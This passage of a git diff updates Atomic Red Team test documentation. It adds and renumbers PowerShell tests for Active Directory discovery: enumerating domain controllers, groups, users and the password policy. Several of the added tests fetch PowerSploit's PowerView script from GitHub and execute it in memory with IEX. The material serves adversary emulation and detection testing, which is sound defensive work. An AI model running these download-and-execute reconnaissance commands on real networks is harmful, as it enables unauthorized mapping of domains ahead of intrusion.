+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
+The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+Upon successful execution a listing of Systems from AD will output with their paths.
+Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-wmiobject -class ds_computer -namespace root\directory\ldap
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md
index 999930da..b7d9a435 100644
--- a/atomics/T1069.002/T1069.002.md
+++ b/atomics/T1069.002/T1069.002.md
@@ -22,11 +22,15 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr
 
 - [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)
 
-- [Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-9---enumerate-active-directory-groups-with-adsisearcher)
+- [Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup](#atomic-test-9---enumerate-active-directory-groups-with-get-adgroup)
 
-- [Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-10---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+- [Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-10---enumerate-active-directory-groups-with-adsisearcher)
 
-- [Atomic Test #11 - Get-DomainGroupMember with PowerView](#atomic-test-11---get-domaingroupmember-with-powerview)
+- [Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+
+- [Atomic Test #12 - Get-DomainGroupMember with PowerView](#atomic-test-12---get-domaingroupmember-with-powerview)
+
+- [Atomic Test #13 - Get-DomainGroup with PowerView](#atomic-test-13---get-domaingroup-with-powerview)
 
 
 <br/>
@@ -317,7 +321,37 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
 <br/>
 <br/>
 
-## Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher
+## Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup
+The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+Upon successful execution a listing of groups will output with their paths in AD.
+Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-AdGroup -Filter *
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher
 The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
 Upon successful execution a listing of groups will output with their paths in AD.
 Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
@@ -347,7 +381,7 @@ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearc
 <br/>
 <br/>
 
-## Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+## Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
 When successful, accounts that do not require kerberos pre-auth will be returned.
 Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
 
@@ -397,7 +431,7 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
 <br/>
 <br/>
 
-## Atomic Test #11 - Get-DomainGroupMember with PowerView
+## Atomic Test #12 - Get-DomainGroupMember with PowerView
 Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
 
 **Supported Platforms:** Windows
@@ -423,4 +457,33 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/R
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #13 - Get-DomainGroup with PowerView
+Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5a8a181c-2c8e-478d-a943-549305a01230
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 55e4e2bd..8c53c827 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -26,7 +26,9 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code
 
 - [Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation](#atomic-test-10---enumerate-active-directory-for-unconstrained-delegation)
 
-- [Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher](#atomic-test-11---enumerate-active-directory-users-with-adsisearcher)
+- [Atomic Test #11 - Get-DomainUser with PowerView](#atomic-test-11---get-domainuser-with-powerview)
+
+- [Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher](#atomic-test-12---enumerate-active-directory-users-with-adsisearcher)
 
 
 <br/>
@@ -446,7 +448,36 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
 <br/>
 <br/>
 
-## Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher
+## Atomic Test #11 - Get-DomainUser with PowerView
+Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 93662494-5ed7-4454-a04c-8c8372808ac2
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher
 The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
 Upon successful execution a listing of users will output with their paths in AD.
 Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index e2953cf8..3f1dc931 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -20,6 +20,10 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems
 
 - [Atomic Test #7 - Examine password policy - macOS](#atomic-test-7---examine-password-policy---macos)
 
+- [Atomic Test #8 - Get-DomainPolicy with PowerView](#atomic-test-8---get-domainpolicy-with-powerview)
+
+- [Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy](#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy)
+
 
 <br/>
 
@@ -241,4 +245,63 @@ pwpolicy getaccountpolicies
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Get-DomainPolicy with PowerView
+Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+Upon successful execution a listing of the policy implemented will display.
+Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b2698b33-984c-4a1c-93bb-e4ba72a0babb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-addefaultdomainpasswordpolicy
+```
+
+
+
+
+
+
 <br/>